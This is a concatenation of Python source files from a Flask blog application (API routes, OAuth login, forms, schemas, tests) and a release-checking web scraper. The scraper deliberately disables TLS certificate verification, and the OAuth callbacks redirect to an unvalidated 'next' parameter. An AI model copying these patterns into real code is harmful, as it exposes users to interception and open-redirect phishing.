pr.assign_random_intern(interns)
if __name__ == '__main__':
main()
``` |
{
"source": "1dot75cm/flasky",
"score": 2
} |
#### File: app/api_1_0/chrome.py
```python
import time
from flask import jsonify, request, abort
from ..models import Chrome
from .. import cache
from . import api
@api.route('/chrome')
@cache.memoize(timeout=600)
def get_chrome():
    '''Get Chrome version info'''
platform = ['win', 'mac', 'linux']
archs = ['x86', 'x64']
channels = ['stable', 'beta', 'dev', 'canary']
cache = request.args.get('cache', False)
if cache in ['0', 'false']:
cache = False
system = request.args.get('os', platform)
arch = request.args.get('arch', archs)
channel = request.args.get('channel', channels)
    system = [system] if isinstance(system, str) else system
    arch = [arch] if isinstance(arch, str) else arch
    channel = [channel] if isinstance(channel, str) else channel
if system[0] in platform and arch[0] in archs and channel[0] in channels:
pkgs, cache = Chrome.check_update(system, channel, arch, cache)
pkglist = []
for pkg in pkgs:
pkglist.append(dict(
name=pkg.name,
version=pkg.version,
os=pkg.os,
arch=pkg.arch,
channel=pkg.channel,
size=pkg.size,
sha256=pkg.hash,
urls=pkg.urls.split(','),
timestamp=time.mktime(pkg.timestamp.timetuple())))
return jsonify({'results': pkglist, 'cache': cache})
else:
abort(404)
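# Example request (assumption: the API blueprint is mounted under /api/v1.0):
#   GET /api/v1.0/chrome?os=win&arch=x64&channel=stable&cache=0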
```
#### File: app/api_1_0/comments.py
```python
from flask import jsonify, request, g, url_for
from .. import db, cache
from ..models import Post, Permission, Comment
from ..schemas import comment_schema, comments_schema
from . import api
from .decorators import permission_required
from .utils import get_data
@api.route('/comments/')
@cache.memoize(timeout=600)
def get_comments():
    '''Get the list of comments'''
query = Comment.query.order_by(Comment.timestamp.desc())
items, prev, next, total = get_data(
query, comments_schema, 'api.get_comments', type='comment')
return jsonify({
'self': items.data,
'prev': prev,
'next': next,
'count': total
})
@api.route('/comments/<int:id>')
@cache.memoize(timeout=600)
def get_comment(id):
    '''Get a single comment'''
comment = Comment.query.get_or_404(id)
return comment_schema.jsonify(comment)
@api.route('/posts/<int:id>/comments/')
@cache.memoize(timeout=600)
def get_post_comments(id):
'''获取文章的评论列表'''
post = Post.query.get_or_404(id)
query = post.comments.order_by(Comment.timestamp.asc())
items, prev, next, total = get_data(
query, comments_schema, 'api.get_post_comments', type='comment')
return jsonify({
'self': items.data,
'prev': prev,
'next': next,
'count': total
})
@api.route('/posts/<int:id>/comments/', methods=['POST'])
@permission_required(Permission.COMMENT)
def new_post_comment(id):
    '''Write a new comment for a post'''
post = Post.query.get_or_404(id)
json_data = request.get_json()
if not json_data:
return jsonify({'message': 'No input data provided'}), 400
comment, errors = comment_schema.load(json_data)
if errors:
return jsonify(errors), 422
comment.author = g.current_user
comment.post = post
db.session.add(comment)
db.session.commit()
return comment_schema.jsonify(comment), 201, \
{'Location': url_for('api.get_comment', id=comment.id,
_external=True)}
```
#### File: app/api_1_0/main.py
```python
from flask import jsonify, url_for, request, send_file
from . import api
from .errors import bad_request
from .. import cache, qrcode
@api.route('/')
def main():
    '''API index'''
return jsonify({
'message': 'Hello, Fedora.',
'version': 'v1.0',
'apis': {
'token': url_for('.get_token', _external=True),
'users': url_for('.get_users', _external=True),
'posts': url_for('.get_posts', _external=True),
'comments': url_for('.get_comments', _external=True),
'chrome': url_for('.get_chrome', _external=True),
'qrcode': url_for('.get_qrcode', _external=True)}
})
@api.route('/qrcode', methods=['GET', 'POST'])
@cache.memoize(timeout=20)
def get_qrcode():
    '''Generate a QR code'''
_request = request.args or request.json
if not hasattr(_request, 'get'):
return bad_request('value error')
    url = _request.get('url', None)           # data to encode
    version = _request.get('version', None)   # image size
    correct = _request.get('correct', 'L')    # error correction level
    box_size = _request.get('box_size', 10)   # pixel size of each box
    border = _request.get('border', 1)        # border size
    fcolor = _request.get('fcolor', 'black')  # foreground color
    bcolor = _request.get('bcolor', 'white')  # background color
    factor = _request.get('factor', 4)        # icon is 1/4 the size of the QR code
    icon = _request.get('icon', 'fedora.png') # icon image
    box = _request.get('box', None)           # icon position "left, top"
box = box.split(',') if box else None
try:
if url is None:
raise ValueError('Need some value')
data = qrcode(url, mode='raw', version=version, error_correction=correct,
box_size=box_size, border=border, fill_color=fcolor,
back_color=bcolor, factor=factor, icon_img=icon, icon_box=box)
    except Exception:
return bad_request('value error')
return send_file(data, mimetype='image/png', cache_timeout=0)
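# Example request (assumption: the API blueprint is mounted under /api/v1.0):
#   GET /api/v1.0/qrcode?url=https://example.com&box_size=8&border=2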
```
#### File: app/api_1_0/posts.py
```python
from flask import jsonify, request, g, url_for
from .. import db, cache
from ..models import Post, Permission
from ..schemas import post_schema, posts_schema
from . import api
from .decorators import permission_required
from .errors import forbidden
from .utils import get_data
@api.route('/posts/')
@cache.memoize(timeout=600)
def get_posts():
    '''Get the list of posts'''
query = Post.query
items, prev, next, total = get_data(
query, posts_schema, 'api.get_posts')
return jsonify({
'self': items.data,
'prev': prev,
'next': next,
'count': total
})
@api.route('/posts/<int:id>')
@cache.memoize(timeout=600)
def get_post(id):
    '''Get a single post'''
post = Post.query.get_or_404(id)
return post_schema.jsonify(post)
@api.route('/posts/', methods=['POST'])
@permission_required(Permission.WRITE_ARTICLES)
def new_post():
    '''Create a new post'''
json_data = request.get_json()
if not json_data:
return jsonify({'message': 'No input data provided'}), 400
post, errors = post_schema.load(json_data)
if errors:
return jsonify(errors), 422
post.author = g.current_user
db.session.add(post)
db.session.commit()
return post_schema.jsonify(post), 201, \
{'Location': url_for('api.get_post', id=post.id, _external=True)}
@api.route('/posts/<int:id>', methods=['PUT'])
@permission_required(Permission.WRITE_ARTICLES)
def edit_post(id):
    '''Edit a post'''
post = Post.query.get_or_404(id)
if g.current_user != post.author and \
not g.current_user.can(Permission.ADMINISTER):
return forbidden('Insufficient permissions')
post.title = request.json.get('title', post.title)
post.body = request.json.get('body', post.body)
db.session.add(post)
return post_schema.jsonify(post)
```
#### File: app/auth/oauth.py
```python
from flask import request, jsonify, json, url_for, session, g, redirect, flash
from flask_login import login_user
from flask_babel import gettext as _
from . import auth
from .. import db, oauth, fas
from ..models import User, OAuth, OAuthType
github = oauth.remote_app('github', app_key='GITHUB') # GitHub OAuth2
google = oauth.remote_app('google', app_key='GOOGLE') # Google OAuth2
@auth.route('/login/oauth')
def oauth_login():
    '''OAuth login'''
if request.args.get('op') == 'github':
return github.authorize(callback=url_for('.oauth_authorized',
next=request.args.get('next') or request.referrer or None,
op='github', _external=True))
if request.args.get('op') == 'google':
return google.authorize(callback=url_for('.oauth_authorized',
op='google', _external=True))
if request.args.get('op') == 'fedora':
return fas.login(return_url=url_for('.oauth_authorized',
next=request.args.get('next') or request.referrer or None,
op='fedora', _external=True),
cancel_url=url_for('.login'))
return jsonify({'error': 'Access denied'})
@auth.route('/login/oauth/authorized')
def oauth_authorized():
    '''Authorization callback'''
op = request.args.get('op')
if op == 'fedora' and g.fas_user:
oauth = OAuth.query.filter_by(remote_uid=g.fas_user.username).first()
oauth_type = OAuthType.query.filter_by(name=op).first()
if oauth is None:
u = User(email=g.fas_user.email,
username=g.fas_user.username,
confirmed=True,
name=g.fas_user.fullname,
location=g.fas_user.timezone,
about_me='Welcome to use flasky.',
oauth=OAuth(type=oauth_type,
remote_uid=g.fas_user.username))
db.session.add(u)
login_user(u)
flash(_('Hello, %(username)s.', username=u.username), 'success')
return redirect(request.args.get('next') or url_for('main.index'))
if oauth:
login_user(oauth.local)
flash(_('Hello, %(username)s.', username=oauth.local.username), 'success')
return redirect(request.args.get('next') or url_for('main.index'))
if op == 'google':
resp = google.authorized_response()
        if resp is None:  # authentication failed
flash('Access denied: reason=%s error=%s' % (
request.args['error'],
request.args['error_description']
), 'danger')
return redirect(request.args.get('next') or url_for('.login'))
        if resp.get('access_token'):  # guard against page refresh
get = google.get('userinfo', token=(resp['access_token'], ''))
me = json.loads(get.raw_data)
oauth = OAuth.query.filter_by(remote_uid=me['id']).first()
oauth_type = OAuthType.query.filter_by(name=op).first()
if get.status == 200:
session['google_id'] = me['id']
            if oauth is None:  # never logged in before; create a new account
u = User(email=me['email'],
username=me['given_name']+me['id'][-4:],
confirmed=True,
name=me['name'],
about_me='Welcome to use flasky.',
oauth=OAuth(type=oauth_type,
remote_uid=me['id'],
access_token=resp['access_token']))
db.session.add(u)
login_user(u)
flash(_('Hello, %(username)s.', username=u.username), 'success')
return redirect(request.args.get('next') or url_for('main.index'))
            if oauth:  # authorized again; update the token
oauth.access_token = resp['access_token']
login_user(oauth.local)
flash(_('Hello, %(username)s.', username=oauth.local.username), 'success')
return redirect(request.args.get('next') or url_for('main.index'))
if op == 'github':
resp = github.authorized_response()
        if resp is None:  # authentication failed
flash('Access denied: reason=%s error=%s' % (
request.args['error'],
request.args['error_description']
), 'danger')
return redirect(request.args.get('next') or url_for('.login'))
        if resp.get('access_token'):  # guard against page refresh
get = github.get('user', token=(resp['access_token'], ''))
me = json.loads(get.raw_data)
oauth = OAuth.query.filter_by(remote_uid=me['id']).first()
oauth_type = OAuthType.query.filter_by(name=op).first()
if get.status == 200:
session['github_id'] = me['id']
            if oauth is None:  # never logged in before; create a new account
                email_addr = '<EMAIL>'  # anonymized; originally built from me['login'] and me['id']
u = User(email=me['email'] if me['email'] else email_addr,
username=me['login'],
confirmed=True,
name=me['name'] if me['name'] else me['login'],
location=me['location'],
about_me='Welcome to use flasky.',
oauth=OAuth(type=oauth_type,
remote_uid=me['id'],
access_token=resp['access_token']))
db.session.add(u)
login_user(u)
flash(_('Hello, %(username)s.', username=u.username), 'success')
return redirect(request.args.get('next') or url_for('main.index'))
            if oauth:  # authorized again; update the token
oauth.access_token = resp['access_token']
login_user(oauth.local)
flash(_('Hello, %(username)s.', username=oauth.local.username), 'success')
return redirect(request.args.get('next') or url_for('main.index'))
flash(_('Access denied.'), 'danger')
return redirect(request.args.get('next') or url_for('.login'))
@github.tokengetter
def get_github_oauth_token(token=None):
    '''Read the token returned by the third-party app'''
uid = session.get('github_id')
oauth = OAuth.query.filter_by(remote_uid=uid).first()
return (oauth.access_token, '')
@google.tokengetter
def get_google_oauth_token():
    '''Read the Google token'''
uid = session.get('google_id')
oauth = OAuth.query.filter_by(remote_uid=uid).first()
return (oauth.access_token, '')
```
#### File: app/main/forms.py
```python
from flask_wtf import FlaskForm as Form
from wtforms import StringField, TextAreaField, BooleanField, SelectField, SubmitField
from wtforms.validators import Required, Length, Email, Regexp
from wtforms import ValidationError
from flask_pagedown.fields import PageDownField
from flask_babel import lazy_gettext as _  # lazily translate text only when the form is rendered
from ..models import User, Role, Category
class NameForm(Form):
    '''Name form'''
name = StringField(_('What is your name?'), validators=[Required()])
submit = SubmitField(_('Submit'))
class EditProfileForm(Form):
    '''Profile edit form'''
name = StringField(_('Real name'), validators=[Length(0, 64)])
location = StringField(_('Location'), validators=[Length(0, 64)])
about_me = TextAreaField(_('About me'))
submit = SubmitField(_('Submit'))
class EditProfileAdminForm(Form):
    '''Profile edit form for administrators'''
email = StringField(_('Email'), validators=[Required(), Length(1, 64), Email()])
username = StringField(_('Username'), validators=[
Required(), Length(1, 64), Regexp('^[A-Za-z][A-Za-z0-9_.]*$', 0,
_('Usernames must have only letters, '
'numbers, dots or underscores'))])
confirmed = BooleanField(_('Confirmed'))
role = SelectField(_('Role'), coerce=int)
name = StringField(_('Real name'), validators=[Length(0, 64)])
location = StringField(_('Location'), validators=[Length(0, 64)])
about_me = TextAreaField(_('About me'))
submit = SubmitField(_('Submit'))
def __init__(self, user, *args, **kwargs):
super(EditProfileAdminForm, self).__init__(*args, **kwargs)
self.user = user
        # set the select widget's options via the choices attribute; format: [(option id, display text), ...]
self.role.choices = [(role.id, role.name)
for role in Role.query.order_by(Role.name).all()]
def validate_email(self, field):
        '''Validate the email address'''
if field.data != self.user.email and \
User.query.filter_by(email=field.data).first():
raise ValidationError(_('Email already registered.'))
def validate_username(self, field):
        '''Validate the username'''
if field.data != self.user.username and \
User.query.filter_by(username=field.data).first():
raise ValidationError(_('Username already in use.'))
class PostForm(Form):
    '''Post form'''
title = StringField(_('Title'), validators=[Required()])
tag = StringField(_('Tags'))
category = SelectField(_('Categories'), coerce=int)
body = PageDownField(_("What's on your mind?"), validators=[Required()])
submit = SubmitField(_('Submit'))
def __init__(self, *args, **kwargs):
super(PostForm, self).__init__(*args, **kwargs)
        # set the select widget's options via the choices attribute; format: [(option id, display text), ...]
self.category.choices = [(cate.id, cate.name)
for cate in Category.query.order_by(Category.name).all()]
class CommentForm(Form):
    '''Comment form'''
body = TextAreaField(_('Enter your comment'), validators=[Required()])
submit = SubmitField(_('Submit'))
class SearchForm(Form):
    '''Search form'''
search = StringField('Search', validators=[Required(), Length(0, 64)])
```
#### File: flasky/app/schemas.py
```python
from marshmallow import pre_load, ValidationError
from .models import (Role, User, Post, Comment, Tag, Category, BlogView, OAuth,
OAuthType, Chrome, Package, Release)
from . import ma
USER_SCHEMA_ONLY = ('username', 'email', 'url', 'posts_url')
POST_SCHEMA_ONLY = ('title', 'timestamp', 'category', 'tags',
'url', 'author_url', 'comments_url')
COMMENT_SCHEMA_ONLY = ('body', 'timestamp', 'url', 'author_url', 'post_url')
class UserSchema(ma.ModelSchema):
    '''Schema for the User model'''
url = ma.Hyperlinks(ma.URLFor('api.get_user', id='<id>', _external=True), dump_only=True)
posts_url = ma.Hyperlinks(ma.URLFor('api.get_user_posts', id='<id>', _external=True), dump_only=True)
favorite_posts_url = ma.Hyperlinks(ma.URLFor('api.get_user_favorite_posts', id='<id>', _external=True), dump_only=True)
followed_posts_url = ma.Hyperlinks(ma.URLFor('api.get_user_followed_posts', id='<id>', _external=True), dump_only=True)
followers_url = ma.Hyperlinks(ma.URLFor('api.get_user_followers', id='<id>', _external=True), dump_only=True)
following_url = ma.Hyperlinks(ma.URLFor('api.get_user_following', id='<id>', _external=True), dump_only=True)
email = ma.String(required=True)
username = ma.String(required=True)
password = ma.String(required=True, load_only=True)
class Meta:
model = User
fields = ('username', 'password', 'email', 'confirmed', 'posts_url', 'followed_posts_url',
'name', 'location', 'about_me', 'member_since', 'last_seen',
'favorite_posts_url', 'followers_url', 'following_url', 'url')
@pre_load
def make_user(self, data):
user = User.query.filter_by(email=data['email']).first()
if user:
raise ValidationError('User already exists')
class PostSchema(ma.ModelSchema):
    '''Schema for the Post model'''
url = ma.Hyperlinks(ma.URLFor('api.get_post', id='<id>', _external=True), dump_only=True)
author_url = ma.Hyperlinks(ma.URLFor('api.get_user', id='<author_id>', _external=True), dump_only=True)
comments_url = ma.Hyperlinks(ma.URLFor('api.get_post_comments', id='<id>', _external=True), dump_only=True)
category = ma.Nested('CategorySchema', only='name')
tags = ma.Nested('TagSchema')
title = ma.String(required=True)
body = ma.String(required=True)
class Meta:
model = Post
fields = ('title', 'body', 'body_html', 'timestamp', 'category', 'tags',
'url', 'author_url', 'comments_url')
@pre_load
def make_post(self, data):
if not data.get('title'):
raise ValidationError('Post does not have a title')
if not data.get('body'):
raise ValidationError('Post does not have a body')
class CommentSchema(ma.ModelSchema):
    '''Schema for the Comment model'''
url = ma.Hyperlinks(ma.URLFor('api.get_comment', id='<id>', _external=True), dump_only=True)
author_url = ma.Hyperlinks(ma.URLFor('api.get_user', id='<author_id>', _external=True), dump_only=True)
post_url = ma.Hyperlinks(ma.URLFor('api.get_post', id='<post_id>', _external=True), dump_only=True)
body = ma.String(required=True)
class Meta:
model = Comment
fields = ('body', 'body_html', 'timestamp',
'url', 'author_url', 'post_url')
@pre_load
def make_comment(self, data):
if not data.get('body'):
raise ValidationError('Comment does not have a body')
class CategorySchema(ma.ModelSchema):
    '''Schema for the Category model'''
class Meta:
model = Category
class TagSchema(ma.ModelSchema):
    '''Schema for the Tag model'''
class Meta:
model = Tag
user_schema = UserSchema()
users_schema = UserSchema(many=True, only=USER_SCHEMA_ONLY)
post_schema = PostSchema()
posts_schema = PostSchema(many=True, only=POST_SCHEMA_ONLY)
comment_schema = CommentSchema()
comments_schema = CommentSchema(many=True, only=COMMENT_SCHEMA_ONLY)
# class BlogViewSchema(ma.ModelSchema):
# class Meta:
# model = BlogView
# class OAuthSchema(ma.ModelSchema):
# class Meta:
# model = OAuth
# class OAuthTypeSchema(ma.ModelSchema):
# class Meta:
# model = OAuthType
# class ChromeSchema(ma.ModelSchema):
# class Meta:
# model = Chrome
# class PackageSchema(ma.ModelSchema):
# class Meta:
# model = Package
# class ReleaseSchema(ma.ModelSchema):
# class Meta:
# model = Release
```
#### File: 1dot75cm/flasky/daemons.py
```python
from __future__ import print_function
import os
import time
import daemon
import lockfile
import manage
from app import create_app, db
from config import logdir
os.environ['IS_DAEMON'] = '1'
if not os.path.exists(logdir):
os.makedirs(logdir)
context = daemon.DaemonContext(
umask=0o002,
working_directory=os.getcwd(),
stdout=open(os.path.join(logdir, "STDOUT"), 'a+'),
stderr=open(os.path.join(logdir, "STDERR"), 'a+'),
pidfile=lockfile.FileLock(os.path.join(logdir, "daemon.pid")))
def echo(data):
now = time.strftime('[%y/%m/%d %H:%M:%S] ', time.localtime())
print(now + data)
if __name__ == '__main__':
print('Run daemon.')
with context:
app = create_app('default')
ctx = app.app_context()
ctx.push()
while True:
echo('Run task.')
manage.check_karma()
db.session.commit()
manage.create_repo()
echo('Task finish.')
time.sleep(app.config['INTERVAL'])
ctx.pop()
```
#### File: flasky/tests/test_client.py
```python
import re
from flask import url_for
from flask_testing import TestCase
from app import create_app, db
from app.models import User, Role
class FlaskClientTestCase(TestCase):
def create_app(self):
        '''Create the app'''
return create_app('testing')
def setUp(self):
        '''Run before each test to initialize the test environment'''
db.create_all()
Role.insert_roles()
def tearDown(self):
        '''Run after each test to clean up the test environment'''
db.session.remove()
db.drop_all()
def test_home_page(self):
        '''Test the home page'''
response = self.client.get(url_for('main.index'))
self.assertTrue(b'Copyright' in response.data)
def test_register_and_login(self):
        '''Test new user registration, account confirmation and login'''
# register a new account
response = self.client.post(url_for('auth.register'), data={
'email': '<EMAIL>',
'username': 'john',
'password': '<PASSWORD>',
'password2': '<PASSWORD>'
})
        self.assertTrue(response.status_code == 302)  # registration succeeded; a redirect is returned
# login with the new account
response = self.client.post(url_for('auth.login'), data={
'email': '<EMAIL>',
'password': '<PASSWORD>'
        }, follow_redirects=True)  # follow the redirect and return the response of the GET request
self.assertTrue(re.search(b'Hello,\s+john!', response.data))
self.assertTrue(
b'You have not confirmed your account yet' in response.data)
# send a confirmation token
user = User.query.filter_by(email='<EMAIL>').first()
        token = user.generate_confirmation_token()  # the token could also be obtained by parsing the email
response = self.client.get(url_for('auth.confirm', token=token),
follow_redirects=True)
self.assertTrue(b'You have confirmed your account' in response.data)
# log out
response = self.client.get(url_for('auth.logout'),
follow_redirects=True)
self.assertTrue(b'You have been logged out' in response.data)
``` |
{
"source": "1dot75cm/repo-checker",
"score": 2
} |
#### File: 1dot75cm/repo-checker/checker3.py
```python
from threading import Thread
from queue import Queue
import urllib.request, urllib.parse, urllib.error
import re, csv, json
import time, sys, os
import argparse, random
import gzip, ssl
from io import BytesIO
import asyncio, aiohttp
import tqdm, signal
class GzipHandler(urllib.request.BaseHandler):
''' A handler to add gzip capabilities to urllib requests '''
def http_request(self, req):
req.add_header('Accept-Encoding', 'gzip')
return req
def http_response(self, req, resp):
old_resp = resp # resp.headers
        data = resp.read()  # in-memory data; can only be read once
try:
content = gzip.GzipFile(fileobj = BytesIO(data), mode = 'r').read()
except OSError:
content = data
        fp = BytesIO(content)  # file-like object exposing a read() method
resp = urllib.request.addinfourl(fp, old_resp.headers, old_resp.url, old_resp.code)
resp.msg = old_resp.msg
return resp
https_request = http_request
https_response = http_response
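# Illustrative standalone use of GzipHandler (assumption: network access is
# available; the URL is a placeholder):
#   opener = urllib.request.build_opener(GzipHandler())
#   page = opener.open('https://example.com').read()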
class Checker(object):
''' check update for software '''
def __init__(self, *args):
self.sub_pkg, self.url_type, self.name, self.url = args[:4]
self.branch, self.rpm_com, self.rpm_date = args[4:7]
self.release_date = self.release_com = ""
self.latest_date = self.latest_com = ""
self.status = ""
self.ualist = [
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; rv:41.0) Gecko/20100101 Firefox/41.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/40.0',
'Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A'
]
def get_page(self, _url):
        ''' Fetch the entire page
        return str '''
header = { 'Accept-Encoding': 'gzip' }
header['User-Agent'] = self.ualist[random.randint(0, len(self.ualist)-1)]
if opts['user_agent']: header['User-Agent'] = opts['user_agent']
req = urllib.request.Request(url = _url, headers = header)
pros = opts['proxy']
if pros and pros[0] in ('http', 'https'):
req.set_proxy(pros[1], pros[0])
# urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed
# https://www.python.org/dev/peps/pep-0476/
context = ssl._create_unverified_context()
page = urllib.request.urlopen(req, timeout=80, context=context).read()
#gzip_handler = GzipHandler()
#proxy_handler = urllib.request.ProxyHandler({'https':'XX.XX.XX.XX:XXXX'})
#proxy_auth_handler = urllib.request.ProxyBasicAuthHandler()
#proxy_auth_handler.add_password('realm', 'host', 'username', 'password')
#opener = urllib.request.build_opener(gzip_handler, proxy_handler, proxy_auth_handler)
#opener.addheaders = [('User-Agent', 'Python-urllib/2.7')]
#urllib.request.install_opener(opener)
#page = opener.open(_url).read()
try:
if self.url_type == "2": return "None Content"
if self.url_type == "4": return gzip.decompress(page).decode('gb2312').encode('utf-8')
else: return gzip.decompress(page)
except OSError:
return page
def get_date(self, _page):
        ''' Extract the date -> 150708
        return short_time(str) '''
time_format = "%Y-%m-%d"
pattern = b'.*datetime="(.*?)T'
if self.url_type in ["4", "6", "14"]:
pattern = b'([0-9]{4}-[0-9]{1,2}-[0-9]{1,2})'
elif self.url_type == "5":
_page = _page.split(b"tragtor")[4]
pattern = b'time.>(.*[0-9]{4})'
time_format = "%a %b %d %H:%M:%S %Y"
elif self.url_type == "7":
if _page.splitlines()[-3].find(b"info") > -1:
_page = _page.splitlines()[-4]
else:
_page = _page.splitlines()[-3]
pattern = b'([0-9]{2}-.{3}-[0-9]{4})'
time_format = "%d-%b-%Y"
elif self.url_type == "8":
pattern = b'tag.*([0-9]{4}-[0-9]{1,2}-[0-9]{1,2})'
elif self.url_type == "9":
pattern = b'id=\w{40}.*([0-9]{4}-[0-9]{2}-[0-9]{2})'
elif self.url_type == "10":
pattern = b'([0-9]{2}\s.{3}\s[0-9]{4})'
time_format = "%d %b %Y"
elif self.url_type == "11":
pattern = b'([A-Z].*\s[0-9]{1,2},\s[0-9]{4})'
time_format = "%B %d, %Y"
elif self.url_type == "12":
pattern = b'id=\w{40}.*tag-deco.*([0-9]{4}-[0-9]{2}-[0-9]{2})'
elif self.url_type == "20":
pattern = b'([0-9]{2}-.{3}-[0-9]{4})'
time_format = "%d-%b-%Y"
elif self.url_type == "21":
_page = json.loads(_page.decode())['PCC'][0]['date'].encode()
pattern = b'(.*)'
elif self.url_type == "22":
_page = re.findall(b'.*364.*', _page)[-1]
pattern = b'([0-9]{2}-\w{3}-[0-9]{4})'
time_format = "%d-%b-%Y"
try:
d = re.search(pattern, _page, re.M).group(1).decode()
t = time.strptime(d, time_format)
return time.strftime("%y%m%d", t)
except (AttributeError, TypeError):
return "None"
def get_commit(self, _page):
        ''' Extract the commit
return commit(str) '''
pattern = b'.*commit/([a-z0-9]*)\"'
if self.url_type == "9":
pattern = b'id=(\w{40})'
elif self.url_type == "12":
pattern = b'id=(\w{40}).*tag-deco'
try:
return re.search(pattern, _page, re.M).group(1).decode()
except (AttributeError, TypeError):
return "None"
def get_info(self):
        ''' Extract commit and date from the page
        return datalist'''
type_num = ["3", "4", "5", "6", "7", "9", "10", "11", "12", "14", "20", "21", "22"]
if self.url_type in type_num:
release_url = self.url.replace('%2',',')
p1 = self.get_page(release_url)
self.release_date, self.release_com = self.get_date(p1), self.get_commit(p1)
self.latest_date, self.latest_com = self.release_date, self.release_com
elif self.url_type != "2":
release_url = self.url + "/releases"
latest_url = self.url + "/commits/" + self.branch
p1, p2 = self.get_page(release_url), self.get_page(latest_url)
self.release_date, self.release_com = self.get_date(p1), self.get_commit(p1)
self.latest_date, self.latest_com = self.get_date(p2), self.get_commit(p2)
if self.rpm_date == self.latest_date or self.rpm_date >= self.release_date:
self.status = "normal"
else:
self.status = "update" + "[" + self.url + "]"
def output(self):
''' Output.
Sub Package: 0. normal 1. subpkg '''
name = "- " + self.name if self.sub_pkg == "1" else self.name
rpm_ver = self.rpm_date + "[" + self.rpm_com[:7] + "]"
rel_ver = self.release_date + "[" + self.release_com[:7] + "]"
lat_ver = self.latest_date + "[" + self.latest_com[:7] + "]"
print(str(name).ljust(22) + \
str(rpm_ver).ljust(16) + \
str(rel_ver).ljust(16) + \
str(lat_ver).ljust(16) + \
str(self.status))
class CheckerAIO(Checker):
@asyncio.coroutine
def get_page(self, _url):
        ''' Fetch the entire page
        return str '''
header = { 'Accept-Encoding': 'gzip' }
header['User-Agent'] = self.ualist[random.randint(0, len(self.ualist)-1)]
if opts['user_agent']: header['User-Agent'] = opts['user_agent']
with (yield from semaphore):
response = yield from aiohttp.request('GET', _url, headers = header)
page = yield from response.read()
try:
if self.url_type == "2": return "None Content"
if self.url_type == "4": return gzip.decompress(page).decode('gb2312').encode('utf-8')
else: return gzip.decompress(page)
except OSError:
return page
@asyncio.coroutine
def get_info(self):
        ''' Extract commit and date from the page
        return datalist'''
type_num = ["3", "4", "5", "6", "7", "9", "10", "11", "12", "14", "20", "21", "22"]
if self.url_type in type_num:
release_url = self.url.replace('%2',',')
p1 = yield from self.get_page(release_url)
self.release_date, self.release_com = self.get_date(p1), self.get_commit(p1)
self.latest_date, self.latest_com = self.release_date, self.release_com
elif self.url_type != "2":
release_url = self.url + "/releases"
latest_url = self.url + "/commits/" + self.branch
p1 = yield from self.get_page(release_url)
p2 = yield from self.get_page(latest_url)
self.release_date, self.release_com = self.get_date(p1), self.get_commit(p1)
self.latest_date, self.latest_com = self.get_date(p2), self.get_commit(p2)
if self.rpm_date == self.latest_date or self.rpm_date >= self.release_date:
self.status = "normal"
else:
self.status = "update" + "[" + self.url + "]"
class Helper(object):
def __init__(self):
global opts
opts = {
'thread_num': 10,
'input_file': 'checker_data.csv',
'user_agent': None,
'proxy' : None,
'mode' : 'aio'
}
self.helper()
self.q = Queue()
self.localtime(1)
def inputs(self):
''' Load csv file.
CSV Format:
"1,1,lwqq,https://github.com/xiehuc/lwqq,master,733836e,150202"
Sub Package: 0. normal 1. subpkg
Url Type: 1. github 2. google 3. bitbucket 4. sogou 5. tragtor 6. youdao
7. opera 8. pacman 9. apt 10. nginx 11. ccal 12. sandbox 14. wps
20. qt-installer-freamwork 21. pycharm
Name, Url, Branch, RPM Commit, RPM Update Time, Others
return list '''
csvlist = []
with open(opts['input_file'], 'r') as csvfile:
content = csv.reader(csvfile, delimiter=',', quotechar='|')
for row in content:
if len(row) != 0 and row[0][0] != "#":
csvlist.append(row)
return csvlist
def output(self, title=None):
''' Output. '''
if title == 1:
print("# Generation date:", self.localtime(0)[0], \
"\n Name".ljust(23) + \
"RPM-Version".ljust(16) + \
"Rel-Version".ljust(16) + \
"Latest-Commit".ljust(16) + \
"Status")
else:
print("Bye~ %s Working: %s Sec" % self.localtime(0))
def localtime(self, trigger=1):
''' return current localtime and seconds. '''
global start_sec, stop_sec
local_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
if trigger == 1:
start_sec = time.time()
elif trigger == 0:
stop_sec = time.time()
return (local_time, stop_sec - start_sec)
def helper(self):
''' display help information.
return csv_path, thread_num'''
doclist = []
for i in __doc__.splitlines():
if i.startswith("@") and i.find(": ") > -1:
doclist.append(i.split(': ')[1])
_author, _email, _project, _github, _description, _version = doclist
parser = argparse.ArgumentParser(description=_description)
parser.add_argument('-n', '--number', metavar='NUM', type=int,
dest='numbers', action='store',
help='{_name} work number of thread(default: 10)'.format(
_name=_project.lower()))
parser.add_argument('-f', '--file', metavar='PATH',
dest='files', action='store',
help='{_name} data file(csv) full path'.format(
_name=_project.lower()))
parser.add_argument('-U', '--user-agent', metavar='AGENT', type=str,
dest='user_agent', action='store',
help='user identify as AGENT(default: random)')
parser.add_argument('-x', '--proxy', metavar='PROTOCOL://HOST:PORT', type=str,
dest='proxy', action='store',
help='use proxy on given port')
parser.add_argument('-m', '--mode', dest='mode', action='store',
choices={'thread','aio'}, default='aio',
help='multi-tasking mode(default: aio)')
parser.add_argument('-v', '--version', dest='version', action='store_true',
help='output version information and exit')
args = parser.parse_args()
if args.version:
print('{} version {}\nWritten by {} <{}>\nReport bug: <{}>'.format(
_project, _version, _author, _email, _github))
sys.exit()
if args.files and os.path.exists(args.files):
opts['input_file'] = args.files
elif args.files is not None:
print("{}: cannot access '{}': No such file or directory"
.format(_project, args.files))
sys.exit()
if args.numbers:
opts['thread_num'] = args.numbers
if args.user_agent:
opts['user_agent'] = args.user_agent
if args.proxy:
